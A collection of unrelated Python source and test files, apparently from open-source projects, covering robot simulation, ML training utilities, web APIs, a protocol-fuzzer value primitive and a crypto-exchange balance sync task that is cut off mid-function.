import os import time import numpy as np from airobot import Robot from airobot.utils.common import euler2quat from airobot.utils.pb_util import TextureModder def main(): """ This function demonstrates how to move the robot arm to the desired joint positions. """ dir_path = os.path.dirname(os.path.realpath(__file__)) texture_path = os.path.join(dir_path, 'textures') robot = Robot('ur5e') robot.arm.go_home() modder = TextureModder(pb_client_id=robot.pb_client.get_client_id()) ori = euler2quat([0, 0, np.pi / 2]) table_id = robot.pb_client.load_urdf('table/table.urdf', [1, 0, 0.4], ori, scaling=0.9) sphere_id = robot.pb_client.load_geom('sphere', size=0.05, mass=1, base_pos=[1, 0, 1.0], rgba=[0, 1, 0, 1]) box_id = robot.pb_client.load_geom('box', size=0.05, mass=1, base_pos=[1, 0.12, 1.0], rgba=[1, 0, 0, 1]) duck_id = robot.pb_client.load_geom('mesh', mass=1, visualfile='duck.obj', mesh_scale=0.1, base_pos=[0.9, -0.4, 1.0], rgba=[0.5, 0.2, 1, 1]) modder.set_texture(table_id, -1, os.path.join(texture_path, '1.jpg')) modder.set_texture(sphere_id, -1, os.path.join(texture_path, '2.jpg')) modder.set_texture(box_id, -1, os.path.join(texture_path, '3.jpg')) modder.set_texture(duck_id, -1, os.path.join(texture_path, '4.jpg')) modder.set_texture_path(texture_path) while True: start = time.time() # modder.randomize('rgb') # modder.randomize('gradient') # modder.randomize('noise') # modder.randomize('texture', exclude={robot.arm.robot_id: []}) # modder.randomize('texture', # exclude={robot.arm.robot_id: [3, 4, 5, 6]}) modder.randomize('all') print('Time cost (s): ', time.time() - start) time.sleep(1) if __name__ == '__main__': main()
11570223
import numpy as np import torch def mixup_vae_data(image, z_mean, z_log_sigma, disc_log_alpha, optimal_match=True): '''Returns mixed inputs, pairs of targets, and lambda''' lam = np.random.beta(2.0, 2.0) batch_size = image.size()[0] if optimal_match: # use the optimal match to provide match index with torch.no_grad(): kl_metric = torch.zeros(batch_size, batch_size) for i in range(batch_size): for j in range(batch_size): kl_metric[i, j] = gaussian_kl_divergence_calculation(z_mean[i, ...], z_log_sigma[i, ...], z_mean[j, ...], z_log_sigma[j, ...]) index = torch.argmin(kl_metric, dim=1) else: # use random permutation to provide match index index = torch.randperm(batch_size).cuda() mixed_image = lam * image + (1 - lam) * image[index, :] mixed_z_mean = lam * z_mean + (1 - lam) * z_mean[index] mixed_z_sigma = lam * torch.exp(z_log_sigma) + (1 - lam) * torch.exp(z_log_sigma[index]) mixed_disc_alpha = lam * torch.exp(disc_log_alpha) + (1 - lam) * torch.exp(disc_log_alpha[index]) return mixed_image, mixed_z_mean, mixed_z_sigma, mixed_disc_alpha, lam def label_smoothing(image, z_mean, z_log_sigma, disc_log_alpha, epsilon=0.1, disc_label=None): if epsilon > 0: lam = np.random.beta(epsilon, epsilon) else: lam = 1 batch_size = image.size()[0] index = torch.randperm(batch_size).cuda() smoothed_image = lam * image + (1 - lam) * image[index, :] smoothed_z_mean = lam * z_mean + (1 - lam) * z_mean[index] smoothed_z_sigma = lam * torch.exp(z_log_sigma) + (1 - lam) * torch.exp(z_log_sigma[index]) smoothed_disc_alpha = lam * torch.exp(disc_log_alpha) + (1 - lam) * torch.exp(disc_log_alpha[index]) smoothed_disc_label = disc_label[index] return smoothed_image, smoothed_z_mean, smoothed_z_sigma, smoothed_disc_alpha, smoothed_disc_label, lam def mixup_raw_labeled_data(image, label, label_weight, alpha=1.0, use_cuda=True): '''Returns mixed inputs, pairs of targets, and lambda''' if alpha > 0: lam = np.random.beta(alpha, alpha) else: lam = 1 batch_size = image.size()[0] if use_cuda: index = torch.randperm(batch_size).cuda() else: index = torch.randperm(batch_size) mixed_image = lam * image + (1 - lam) * image[index, :] label_a, label_b = label, label[index] label_weight_a, label_weight_b = label_weight, label_weight[index] return mixed_image, label_a, label_b, label_weight_a, label_weight_b, lam def mixup_criterion(criterion, prediction, label_a, label_b, lam): """ :param criterion: the cross entropy criterion :param prediction: y_pred :param label_a: label = lam * label_a + (1-lam)* label_b :param label_b: label = lam * label_a + (1-lam)* label_b :param lam: label = lam * label_a + (1-lam)* label_b :return: cross_entropy(pred,label) """ return lam * criterion(label_a, prediction) + (1 - lam) * criterion(label_b, prediction) def mixup_data(image, label, alpha=1.0, use_cuda=True): '''Returns mixed inputs, pairs of targets, and lambda''' if alpha > 0: lam = np.random.beta(alpha, alpha) else: lam = 1 batch_size = image.size()[0] if use_cuda: index = torch.randperm(batch_size).cuda() else: index = torch.randperm(batch_size) mixed_image = lam * image + (1 - lam) * image[index, :] label_a, label_b = label, label[index] return mixed_image, label_a, label_b, lam def gaussian_kl_divergence_calculation(z_mean_1, z_log_sigma_1, z_mean_2, z_log_sigma_2): dim = z_mean_1.size(0) z_sigma_1 = torch.exp(z_log_sigma_1) z_sigma_2 = torch.exp(z_log_sigma_2) kl_1_2 = torch.sum(z_log_sigma_2 - z_log_sigma_1) + 0.5 * torch.sum( z_sigma_1 ** 2 / z_sigma_2 ** 2) + 0.5 * torch.sum((z_mean_1 - z_mean_2) ** 2 / (z_sigma_2 ** 2)) - 0.5 * dim return kl_1_2
11570230
from base64 import b64encode from asgi_webdav.constants import DAVPath, DAVUser from asgi_webdav.config import update_config_from_obj, get_config from asgi_webdav.auth import DAVAuth from asgi_webdav.request import DAVRequest config_data = { "account_mapping": [ {"username": "user1", "password": "<PASSWORD>", "permissions": list()} ] } basic_authorization = b"Basic " + b64encode( "{}:{}".format("user1", "pass1").encode("utf-8") ) basic_authorization_bad = b"Basic bad basic_authorization" def fake_call(): pass request = DAVRequest( {"method": "GET", "headers": {b"authorization": b"placeholder"}, "path": "/"}, fake_call, fake_call, ) def test_basic_access_authentication(): update_config_from_obj(config_data) dav_auth = DAVAuth(get_config()) request.headers.update( { b"authorization": basic_authorization, } ) account, message = dav_auth.pick_out_user(request) print(basic_authorization) print(dav_auth.basic_auth.credential_user_mapping) print(account) print(message) assert isinstance(account, DAVUser) request.headers.update( { b"authorization": basic_authorization_bad, } ) account, message = dav_auth.pick_out_user(request) print(account) print(message) assert account is None def test_verify_permission(): username = "user1" password = "<PASSWORD>" admin = False # "+" permissions = ["+^/aa"] dav_user = DAVUser(username, password, permissions, admin) assert not dav_user.check_paths_permission([DAVPath("/a")]) assert dav_user.check_paths_permission([DAVPath("/aa")]) assert dav_user.check_paths_permission([DAVPath("/aaa")]) permissions = ["+^/bbb"] dav_user = DAVUser(username, password, permissions, admin) assert not dav_user.check_paths_permission( [DAVPath("/aaa")], ) # "-" permissions = ["-^/aaa"] dav_user = DAVUser(username, password, permissions, admin) assert not dav_user.check_paths_permission( [DAVPath("/aaa")], ) # "$" permissions = ["+^/a$"] dav_user = DAVUser(username, password, permissions, admin) assert dav_user.check_paths_permission( [DAVPath("/a")], ) assert not dav_user.check_paths_permission( [DAVPath("/ab")], ) assert not dav_user.check_paths_permission( [DAVPath("/a/b")], ) # multi-rules permissions = ["+^/a$", "+^/a/b"] dav_user = DAVUser(username, password, permissions, admin) assert dav_user.check_paths_permission( [DAVPath("/a")], ) assert dav_user.check_paths_permission( [DAVPath("/a/b")], ) permissions = ["+^/a$", "+^/a/b", "-^/a/b/c"] dav_user = DAVUser(username, password, permissions, admin) assert dav_user.check_paths_permission( [DAVPath("/a")], ) assert dav_user.check_paths_permission( [DAVPath("/a/b")], ) assert not dav_user.check_paths_permission( [DAVPath("/a/b/c")], ) permissions = ["+^/a$", "+^/a/b1", "-^/a/b2"] dav_user = DAVUser(username, password, permissions, admin) assert dav_user.check_paths_permission( [DAVPath("/a")], ) assert dav_user.check_paths_permission( [DAVPath("/a/b1")], ) assert not dav_user.check_paths_permission( [DAVPath("/a/b2")], )
11570239
from typing import List import spacy from fastapi import FastAPI from pydantic import BaseModel import edsnlp app = FastAPI(title="EDS-NLP", version=edsnlp.__version__) nlp = spacy.blank("eds") nlp.add_pipe("eds.sentences") config = dict( regex=dict( covid=[ "covid", r"covid[-\s]?19", r"sars[-\s]?cov[-\s]?2", r"corona[-\s]?virus", ], ), attr="LOWER", ) nlp.add_pipe("eds.matcher", config=config) nlp.add_pipe("eds.negation") nlp.add_pipe("eds.family") nlp.add_pipe("eds.hypothesis") nlp.add_pipe("eds.reported_speech") class Entity(BaseModel): # (2) # OMOP-style attributes start: int end: int label: str lexical_variant: str normalized_variant: str # Qualifiers negated: bool hypothesis: bool family: bool reported_speech: bool class Document(BaseModel): # (1) text: str ents: List[Entity] @app.post("/process", response_model=List[Document]) # (1) async def process( notes: List[str], # (2) ): documents = [] for doc in nlp.pipe(notes): entities = [] for ent in doc.ents: entity = Entity( start=ent.start_char, end=ent.end_char, label=ent.label_, lexical_variant=ent.text, normalized_variant=ent._.normalized_variant, negated=ent._.negation, hypothesis=ent._.hypothesis, family=ent._.family, reported_speech=ent._.reported_speech, ) entities.append(entity) documents.append( Document( text=doc.text, ents=entities, ) ) return documents
11570257
import Pyro5.api import Pyro5.core import Pyro5.client import Pyro5.server import Pyro5.nameserver import Pyro5.callcontext import Pyro5.serializers from Pyro5.serializers import SerializerBase def test_api(): assert hasattr(Pyro5.api, "__version__") assert Pyro5.api.config.SERIALIZER == "serpent" assert Pyro5.api.URI is Pyro5.core.URI assert Pyro5.api.Proxy is Pyro5.client.Proxy assert Pyro5.api.Daemon is Pyro5.server.Daemon assert Pyro5.api.start_ns is Pyro5.nameserver.start_ns assert Pyro5.api.current_context is Pyro5.callcontext.current_context assert Pyro5.api.register_dict_to_class == SerializerBase.register_dict_to_class assert Pyro5.api.register_class_to_dict == SerializerBase.register_class_to_dict assert Pyro5.api.unregister_dict_to_class == SerializerBase.unregister_dict_to_class assert Pyro5.api.unregister_class_to_dict == SerializerBase.unregister_class_to_dict
11570266
from setuptools import setup, find_packages import glob import zhuaxia.zxver as zxver setup( name = 'zhuaxia', version = zxver.version, install_requires=['pycrypto', 'requests','mutagen','beautifulsoup4' ], packages = find_packages(), package_data={'zhuaxia':['conf/default.*']}, #data_files=[('conf',glob.glob('conf/*.*'))], include_package_data= True, zip_safe=False, scripts=['zx'], author='<NAME>', author_email='<EMAIL>', platforms=['POSIX'], keywords='xiami mp3 download', url='https://github.com/sk1418/zhuaxia', description='a cli tool to download mp3 from xiami.com and music.163', long_description=""" a cli tool to download mp3 from xiami.com and music.163 """, )
11570292
import requests from bgmi import config from bgmi.plugin.download import BaseDownloadService, DownloadStatus, RpcError class DelugeRPC(BaseDownloadService): def __init__(self): self._id = 0 self._session = requests.session() self._call("auth.login", [config.DELUGE_RPC_PASSWORD]) @staticmethod def check_config() -> None: pass @staticmethod def check_dep(): pass def get_status(self, id: str) -> DownloadStatus: status = self._call("web.get_torrent_status", [id, ["state"]]) return { "Error": DownloadStatus.error, "Downloading": DownloadStatus.downloading, "Paused": DownloadStatus.not_downloading, "Seeding": DownloadStatus.done, }.get(status["state"], DownloadStatus.error) def add_download(self, url: str, save_path: str): options = { "add_paused": False, "move_completed": False, "download_location": save_path, } e = self._call("core.add_torrent_url", [url, options]) return e def _call(self, methods, params=None): if params is None: params = [] r = self._session.post( config.DELUGE_RPC_URL, headers={"Content-Type": "application/json"}, json={"method": methods, "params": params, "id": self._id}, timeout=10, ) self._id += 1 e = r.json() if "result" not in e: raise RpcError("deluge error, reason: {}".format(e["error"]["message"])) return e["result"]
11570302
from tests.helm_template_generator import render_chart import pytest import yaml from . import git_root_dir with open(f"{git_root_dir}/tests/default_chart_data.yaml") as file: default_chart_data = yaml.load(file, Loader=yaml.SafeLoader) template_ids = [template["name"] for template in default_chart_data] @pytest.mark.parametrize("template", default_chart_data, ids=template_ids) def test_default_chart_with_basedomain(template): """Test that each template used with just baseDomain set renders.""" docs = render_chart( show_only=[template["name"]], ) assert len(docs) == template["length"]
11570348
import numpy as np class DataFormatConverter(): def __init__(self, pose_config_source, pose_config_target): self.pose_config_source = pose_config_source self.pose_config_target = pose_config_target self.num_source_kpts = len(self.pose_config_source['KEYPOINT_NAMES']) self.num_target_kpts = len(self.pose_config_target['KEYPOINT_NAMES']) # assert that at all keypoints in target are contained in source self.index_map = [] err_str = "Bad data formats. All target keypoints must be in source!" for k in self.pose_config_target['KEYPOINT_NAMES']: assert k in self.pose_config_source['KEYPOINT_NAMES'], err_str self.index_map.append(self.pose_config_source['KEYPOINT_NAMES'].index(k)) def source_to_target(self, source_pose_array, dim=2): if len(source_pose_array.shape) == 1: len_arrays = len(source_pose_array) num_arrays = 1 source_pose_array = source_pose_array[np.newaxis,...] else: num_arrays, len_arrays = source_pose_array.shape err_str = "Bad input. Array doesn't match source data format length." assert len_arrays == self.num_source_kpts * dim, err_str # transform an array in the source format to the target format if dim == 1: return source_pose_array[:,self.index_map] else: t_x = source_pose_array[:,0::dim][:,self.index_map] t_y = source_pose_array[:,1::dim][:,self.index_map] if dim == 3: t_z = source_pose_array[:,2::dim][:,self.index_map] target_pose_array = np.vstack((t_x,t_y,t_z)).reshape((-1,self.num_target_kpts * dim),order='F') elif dim == 2: target_pose_array = np.vstack((t_x,t_y)).reshape((-1,self.num_target_kpts * dim),order='F') else: raise ValueError("Dimension has to be one of: [1,2,3].") return target_pose_array def target_to_source(self, target_pose_array, dim=2): if len(target_pose_array.shape) == 1: len_arrays = len(target_pose_array) num_arrays = 1 target_pose_array = target_pose_array[np.newaxis,...] else: num_arrays, len_arrays = target_pose_array.shape err_str = "Bad input. Array doesn't match target data format length." assert len_arrays == self.num_target_kpts * dim, err_str inv = np.nan # -1 source_pose_array = inv * np.ones((num_arrays, dim * self.num_source_kpts)) if dim == 1: source_pose_array[:, self.index_map] = target_pose_array elif dim in [2,3]: # transform an array in the target format to the source format s_x = inv * np.ones((num_arrays, self.num_source_kpts)) s_x[:, self.index_map] = target_pose_array[:, 0::dim] source_pose_array[:, 0::dim] = s_x s_y = inv * np.ones((num_arrays, self.num_source_kpts)) s_y[:, self.index_map] = target_pose_array[:, 1::dim] source_pose_array[:, 1::dim] = s_y if dim == 3: s_z = inv * np.ones((num_arrays, self.num_source_kpts)) s_z[:, self.index_map] = target_pose_array[:, 2::dim] source_pose_array[:, 2::dim] = s_z else: raise ValueError("Dimension has to be one of: [1,2,3].") return source_pose_array
11570350
import json import logging from typing import Dict, List, Tuple, Union from repro.common import util from repro.common.docker import DockerContainer from repro.common.io import read_jsonl_file from repro.data.types import MetricsType, TextType from repro.models import Model from repro.models.scialom2021 import DEFAULT_IMAGE, MODEL_NAME logger = logging.getLogger(__name__) @Model.register(f"{MODEL_NAME}-questeval") class QuestEval(Model): def __init__(self, image: str = DEFAULT_IMAGE, device: int = 0): self.image = image self.device = device @staticmethod def _check_single_text(texts_list: List[List[TextType]]) -> List[TextType]: single_texts = [] for texts in texts_list: if texts is None: single_texts.append(None) else: if len(texts) != 1: raise Exception( f"QuestEval only supports single sources and references. Found: {len(texts)}" ) single_texts.append(texts[0]) return single_texts def predict( self, candidate: TextType, sources: List[TextType] = None, references: List[TextType] = None, **kwargs, ) -> MetricsType: return self.predict_batch( [{"candidate": candidate, "sources": sources, "references": references}], **kwargs, )[0] def predict_batch( self, inputs: List[Dict[str, Union[TextType, List[TextType]]]], **kwargs ) -> Tuple[MetricsType, List[MetricsType]]: logger.info(f"Calculating QuestEval for {len(inputs)} inputs") candidates = [inp["candidate"] for inp in inputs] sources_list = [inp["sources"] if "sources" in inp else None for inp in inputs] references_list = [ inp["references"] if "references" in inp else None for inp in inputs ] # QuestEval only supports single sources and references sources = self._check_single_text(sources_list) references = self._check_single_text(references_list) # Ensure all are strings or None candidates = [util.flatten(candidate) for candidate in candidates] sources = [ util.flatten(source) if source is not None else None for source in sources ] references = [ util.flatten(reference) if reference is not None else None for reference in references ] with DockerContainer(self.image) as backend: host_input_file = f"{backend.host_dir}/input.jsonl" container_input_file = f"{backend.container_dir}/input.jsonl" with open(host_input_file, "w") as out: for candidate, source, reference in zip( candidates, sources, references ): out.write( json.dumps( { "candidate": candidate, "source": source, "reference": reference, } ) + "\n" ) host_output_file = f"{backend.host_dir}/output.jsonl" container_output_file = f"{backend.container_dir}/output.jsonl" kwargs_str = json.dumps(kwargs) if "'" in kwargs_str: raise Exception( "Character `'` is currently not supported in values of `kwargs`" ) cuda = self.device != -1 commands = [] if cuda: commands.append(f"export CUDA_VISIBLE_DEVICES={self.device}") score_device = 0 else: score_device = -1 commands.append( f"python score.py" f" --input-file {container_input_file}" f" --kwargs '{kwargs_str}'" f" --cuda-device {score_device}" f" --output-file {container_output_file}" ) command = " && ".join(commands) backend.run_command(command=command, cuda=cuda, network_disabled=True) results = read_jsonl_file(host_output_file) micro_metrics = [{"questeval": metrics["scores"]} for metrics in results] macro_metrics = util.average_dicts(micro_metrics) return macro_metrics, micro_metrics @Model.register(f"{MODEL_NAME}-questeval-summarization") class QuestEvalForSummarization(QuestEval): @staticmethod def _check_and_update_kwargs(kwargs: Dict): if "task" in kwargs: if kwargs["task"] != "summarization": raise Exception(f'kwarg `task` must be equal to "summarization"') else: kwargs["task"] = "summarization" if "do_weighter" in kwargs: if kwargs["do_weighter"] != True: raise Exception(f"kwarg `do_weighter` must be equal to `True`") else: kwargs["do_weighter"] = True def predict(self, *args, **kwargs) -> MetricsType: self._check_and_update_kwargs(kwargs) return super().predict(*args, **kwargs) def predict_batch(self, *args, **kwargs) -> Tuple[MetricsType, List[MetricsType]]: self._check_and_update_kwargs(kwargs) return super().predict_batch(*args, **kwargs) @Model.register(f"{MODEL_NAME}-questeval-simplification") class QuestEvalForSimplification(QuestEval): @staticmethod def _check_and_update_kwargs(kwargs: Dict): if "task" in kwargs: if kwargs["task"] != "text_simplification": raise Exception(f'kwarg `task` must be equal to "text_simplification"') else: kwargs["task"] = "text_simplification" if "do_BERTScore" in kwargs: if kwargs["do_BERTScore"] != True: raise Exception(f"kwarg `do_BERTScore` must be equal to `True`") else: kwargs["do_BERTScore"] = True def predict(self, *args, **kwargs) -> MetricsType: self._check_and_update_kwargs(kwargs) return super().predict(*args, **kwargs) def predict_batch(self, *args, **kwargs) -> Tuple[MetricsType, List[MetricsType]]: self._check_and_update_kwargs(kwargs) return super().predict_batch(*args, **kwargs)
11570362
import argparse import random import cv2 import numpy as np import pickle import math from sklearn import preprocessing from collections import OrderedDict class ClassifierANN(object): def __init__(self, feature_vector_size, label_words): self.ann = cv2.ml.ANN_MLP_create() # Number of centroids used to build the feature vectors input_size = feature_vector_size # Number of models to recongnize output_size = len(label_words) # Applying Heaton rules hidden_size = (input_size * (2 / 3)) + output_size nn_config = np.array([input_size, hidden_size, output_size], dtype=np.uint8) self.label_words = label_words self.ann.setLayerSizes(np.array(nn_config)) # Symmetrical Sigmoid as activation function self.ann.setActivationFunction(cv2.ml.ANN_MLP_SIGMOID_SYM) # Map models as tuples of probabilities self.le = preprocessing.LabelBinarizer() self.le.fit(label_words) # Label words are ['dress', 'footwear', 'backpack'] def train(self, training_set): label_words = [item['label'] for item in training_set] dim_size = training_set[0]['feature_vector'].shape[1] train_samples = np.asarray( [np.reshape(x['feature_vector'], (dim_size,)) for x in training_set] ) # Convert item labels into encoded binary tuples train_response = np.array(self.le.transform(label_words), dtype=np.float32) self.ann.train(np.array(train_samples, dtype=np.float32), cv2.ml.ROW_SAMPLE, np.array(train_response, dtype=np.float32) ) def get_confusion_matrix(self, testing_set): feature_vectors, expected_labels = self._get_network_io(testing_set) confusion_matrix = self._init_confusion_matrix(self.label_words) retval, test_outputs = self.ann.predict(feature_vectors) for expected_output, test_output in zip(expected_labels, test_outputs): expected_model = self.classify(expected_output) predicted_model = self.classify(test_output) confusion_matrix[expected_model][predicted_model] += 1 return confusion_matrix def classify(self, encoded_word, threshold = 0.5): models = self.le.inverse_transform(np.asarray([encoded_word]), threshold) return models[0] def _get_network_io(self, features_map): label_words = [ item['label'] for item in features_map] dim_size = features_map[0]['feature_vector'].shape[1] inputs = np.asarray([np.reshape(x['feature_vector'], (dim_size,)) for x in features_map]) outputs = np.array(self.le.transform(label_words), dtype=np.float32) return inputs, outputs def _init_confusion_matrix(self, label_words): confusion_matrix = OrderedDict() for label in label_words: confusion_matrix[label] = OrderedDict() for label2 in label_words: confusion_matrix[label][label2] = 0 return confusion_matrix def build_arg_parser(): parser = argparse.ArgumentParser(description='Creates features for given images') parser.add_argument("--feature-map-file", dest="feature_map_file", required=True, help="Input pickle file containing the feature map") parser.add_argument("--training-set", dest="training_set", required=True, help="Percentage taken for training. ie 0.75") parser.add_argument("--ann-file", dest="ann_file", required=False, help="Output file where ANN will be stored") parser.add_argument("--le-file", dest="le_file", required=False, help="Output file where LabelEncoder class will be stored") return parser def print_confusion_matrix(confusion_matrix): expected_model = confusion_matrix.keys() print ('\t\t', '\t'.join([expected_type.ljust(15) for expected_type in expected_model])) for expected_type in expected_model: values = [] for predicted_values in confusion_matrix.values(): for predicted_model, value in predicted_values.items(): if predicted_model == expected_type: values.append(str(value).ljust(10)) print('%s\t\t%s' % (expected_type.ljust(15), '\t'.join(values))) def print_accuracy(confusion_matrix): acc_models = OrderedDict() for model in confusion_matrix.keys(): acc_models[model] = {'TP':0, 'TN':0, 'FP':0, 'FN': 0} for expected_model, predicted_models in confusion_matrix.items(): for predicted_model, value in predicted_models.items(): if predicted_model == expected_model: acc_models[expected_model]['TP'] += value acc_models[predicted_model]['TN'] += value else: acc_models[expected_model]['FN'] += value acc_models[predicted_model]['FP'] += value for model, rep in acc_models.items(): acc = (rep['TP']+rep['TN'])/(rep['TP']+rep['TN']+rep['FN']+rep['FP']) print('%s \t %f' % (model,acc)) def split_feature_map(feature_map, training_set_per): feature_map_dict = dict() for item in feature_map: label = item['label'] if label not in feature_map_dict: feature_map_dict[label] = list() feature_map_dict[label].append(item) training_feature_map = [] testing_feature_map = [] for label, feature_map_list in feature_map_dict.items(): slice = math.trunc(len(feature_map_list) * training_set_per) random.shuffle(feature_map_list) training_feature_map += feature_map_list[:slice] testing_feature_map += feature_map_list[slice:] return training_feature_map, testing_feature_map if __name__ == '__main__': args = build_arg_parser().parse_args() # Load the Feature Map with open(args.feature_map_file, 'rb') as f: feature_map = pickle.load(f) training_set, testing_set = split_feature_map(feature_map, float(args.training_set)) label_words = np.unique([item['label'] for item in training_set]) cnn = ClassifierANN(len(feature_map[0]['feature_vector'][0]), label_words) cnn.train(training_set) print("===== Confusion Matrix =====") confusion_matrix = cnn.get_confusion_matrix(testing_set) print_confusion_matrix(confusion_matrix) print("===== ANN Accuracy =====") print_accuracy(confusion_matrix) if 'ann_file' in args and 'le_file' in args: print("===== Saving ANN =====") with open(args.ann_file, 'wb') as f: cnn.ann.save(args.ann_file) with open(args.le_file, 'wb') as f: pickle.dump(cnn.le, f) print('Saved in: ', args.ann_file)
11570413
import argparse import torch from torch import Tensor from pl_bolts.models.rl.sac_model import SAC def test_sac_loss(): """Test the reinforce loss function.""" parent_parser = argparse.ArgumentParser(add_help=False) parent_parser = SAC.add_model_specific_args(parent_parser) args_list = [ "--env", "Pendulum-v0", "--batch_size", "32", ] hparams = parent_parser.parse_args(args_list) model = SAC(**vars(hparams)) batch_states = torch.rand(32, 3) batch_actions = torch.rand(32, 1) batch_rewards = torch.rand(32) batch_dones = torch.ones(32) batch_next_states = torch.rand(32, 3) batch = (batch_states, batch_actions, batch_rewards, batch_dones, batch_next_states) policy_loss, q1_loss, q2_loss = model.loss(batch) assert isinstance(policy_loss, Tensor) assert isinstance(q1_loss, Tensor) assert isinstance(q2_loss, Tensor) def test_sac_train_batch(): """Tests that a single batch generates correctly.""" parent_parser = argparse.ArgumentParser(add_help=False) parent_parser = SAC.add_model_specific_args(parent_parser) args_list = [ "--env", "Pendulum-v0", "--batch_size", "32", ] hparams = parent_parser.parse_args(args_list) model = SAC(**vars(hparams)) xp_dataloader = model.train_dataloader() batch = next(iter(xp_dataloader)) assert len(batch) == 5 assert len(batch[0]) == model.hparams.batch_size assert isinstance(batch, list) assert all(isinstance(batch[i], Tensor) for i in range(5))
11570430
from .base_primitive import BasePrimitive class Group(BasePrimitive): def __init__(self, name, values): """ This primitive represents a list of static values, stepping through each one on mutation. You can tie a block to a group primitive to specify that the block should cycle through all possible mutations for *each* value within the group. The group primitive is useful for example for representing a list of valid opcodes. @type name: str @param name: Name of group @type values: list or str @param values: List of possible raw values this group can take. """ super(Group, self).__init__() self._name = name self.values = values assert len(self.values) > 0, "You can't have an empty value list for your group!" self._value = self._original_value = self.values[0] for val in self.values: assert isinstance(val, basestring), "Value list may only contain strings or raw data" @property def name(self): return self._name def mutate(self): """ Move to the next item in the values list. @rtype: bool @return: False """ # TODO: See if num_mutations() can be done away with (me thinks yes). if self._mutant_index == self.num_mutations(): self._fuzz_complete = True # if fuzzing was disabled or complete, and mutate() is called, ensure the original value is restored. if not self._fuzzable or self._fuzz_complete: self._value = self._original_value return False # step through the value list. # TODO: break this into a get_value() function, so we can keep mutate as close to standard as possible. self._value = self.values[self._mutant_index] # increment the mutation count. self._mutant_index += 1 return True def num_mutations(self): """ Number of values in this primitive. @rtype: int @return: Number of values in this primitive. """ return len(self.values)
11570472
from __future__ import absolute_import, unicode_literals import importlib import re import binascii from json import JSONDecodeError from djangoTrade.celery import app from ccxt import ExchangeNotAvailable, RequestTimeout from celery.schedules import crontab from celery.task import periodic_task import datetime import time import requests from decimal import Decimal as _D from django.contrib.auth.models import User from trade.models import UserExchange, UserBalance, Coin, Exchanges, Wallets, UserWallet, Transaction, UserHoldings from yandex_money.api import Wallet from tradeBOT.models import ExchangeCoin, Pair, CoinMarketCupCoin, ExchangeMainCoin from ticker_app.models import ExchangeTicker def class_for_name(module_name, class_name): m = importlib.import_module(module_name) c = getattr(m, class_name) return c @app.task() def pull_exchanges_balances(ue_pk=None): unnecessary_keys = ['free', 'total', 'used', 'info'] if ue_pk is None: user_exchanges = UserExchange.objects.filter(is_active=True) else: user_exchanges = UserExchange.objects.filter(pk=ue_pk) if len(user_exchanges) > 0: for user_exchange in user_exchanges: exchange_object = class_for_name('ccxt', user_exchange.exchange.name)( {'apiKey': user_exchange.apikey, 'secret': user_exchange.apisecret}) try: try: balances = exchange_object.fetch_balance() except binascii.Error: user_exchange.error = 'Incorrect apikey or secret' user_exchange.is_correct = False user_exchange.is_active = False user_exchange.save() continue if balances: total_btc = _D(0) for item in balances.items(): if item[0] not in unnecessary_keys: try: user_coin = UserBalance.objects.get(ue=user_exchange, coin=item[0].lower()) user_coin.total = (item[1]['total'] if item[1]['total'] is not None else 0) user_coin.btc_value, user_coin.conversions = fetch_btc_value(user_exchange.exchange, item[0].lower(), item[1]['total']) user_coin.used = (item[1]['used'] if item[1]['used'] is not None else 0) user_coin.free = (item[1]['free'] if item[1]['free'] is not None else 0) user_coin.save() total_btc += _D(user_coin.btc_value) except UserBalance.DoesNotExist: new_user_coin = UserBalance() new_user_coin.ue = user_exchange new_user_coin.coin = item[0].lower() new_user_coin.total = (item[1]['total'] if not item[1]['total'] is None else 0) new_user_coin.btc_value, new_user_coin.conversions = fetch_btc_value( user_exchange.exchange, item[0].lower(), item[1]['total']) new_user_coin.used = (item[1]['used'] if item[1]['used'] is not None else 0) new_user_coin.free = (item[1]['free'] if item[1]['free'] is not None else 0) new_user_coin.save() total_btc += _D(new_user_coin.btc_value) user_exchange.total_btc = total_btc user_exchange.total_usd = get_usd_value('btc', total_btc) user_exchange.save() except ExchangeNotAvailable as e: # user_exchange.is_active = False # user_exchange.is_active_script = False user_exchange.error = e user_exchange.save() except RequestTimeout: continue return True def fetch_btc_value(exchange, coin, amount=None, convertations=None): if amount is None: amount = 0 if _D(amount) == _D(0): return 0, 'Null balance' if convertations is None: convertations = [coin + ' (' + str(_D(str(amount)).quantize(_D('.00000001'))) + ')'] if coin.lower() == 'btc': return amount, '->'.join(convertations) try: coin = ExchangeCoin.objects.get(symbol=coin.lower(), exchange=exchange) # print('Нашел валюту: {}'.format(coin.symbol.upper())) try: # print('1Ищу пару BTC_{}'.format(coin.symbol.upper())) pair = Pair.objects.get(main_coin=ExchangeCoin.objects.get(symbol='btc', exchange=exchange), second_coin=coin) # print('1Нашел пару {}_{}'.format(pair.main_coin.symbol, pair.second_coin.symbol)) ticker = ExchangeTicker.objects.filter(pair_id=pair.pk, exchange_id=exchange.pk).latest('id') # print('1Нашел тикер {} {}'.format(ticker, ticker.last)) new_amount = _D(amount).quantize(_D('.00000001')) * _D(ticker.last).quantize(_D('.00000001')) convertations.append('btc (' + str(_D(str(new_amount)).quantize(_D('.00000001'))) + ')') return new_amount, '->'.join(convertations) except Pair.DoesNotExist: try: # print('2Ищу пару {}_BTC'.format(coin.symbol.upper())) pair = Pair.objects.get(second_coin=ExchangeCoin.objects.get(symbol='btc', exchange=exchange), main_coin=coin) # print('2Нашел пару {}_{}'.format(pair.main_coin.symbol, pair.second_coin.symbol)) ticker = ExchangeTicker.objects.filter(pair_id=pair.pk, exchange_id=exchange.pk).latest('id') # print('2Нашел тикер {} {}'.format(ticker, ticker.last)) new_amount = _D(amount).quantize(_D('.00000001')) / _D(ticker.last).quantize(_D('.00000001')) convertations.append('btc (' + str(_D(str(new_amount)).quantize(_D('.00000001'))) + ')') return new_amount, '->'.join(convertations) except Pair.DoesNotExist: try: # print('3Ищу пару где вторая валюта {}'.format(coin.symbol.upper())) pair = Pair.objects.get(second_coin=coin) # print('3Нашел пару {}_{}'.format(pair.main_coin.symbol, pair.second_coin.symbol)) ticker = ExchangeTicker.objects.filter(pair_id=pair.pk, exchange_id=exchange.pk).latest('id') # print('3Нашел тикер {} {}'.format(ticker, ticker.last)) in_first_coin = _D(ticker.last) * _D(amount) convertations.append( pair.main_coin.symbol + ' (' + str(_D(str(in_first_coin)).quantize(_D('.00000001'))) + ')') fetch_btc_value(exchange, pair.main_coin.symbol, in_first_coin, convertations) except Pair.DoesNotExist: # print('3Пара на найдена') return 0, 'Not found' except ExchangeTicker.DoesNotExist: # print("3Тикер не найден") return 0, 'Not found' except 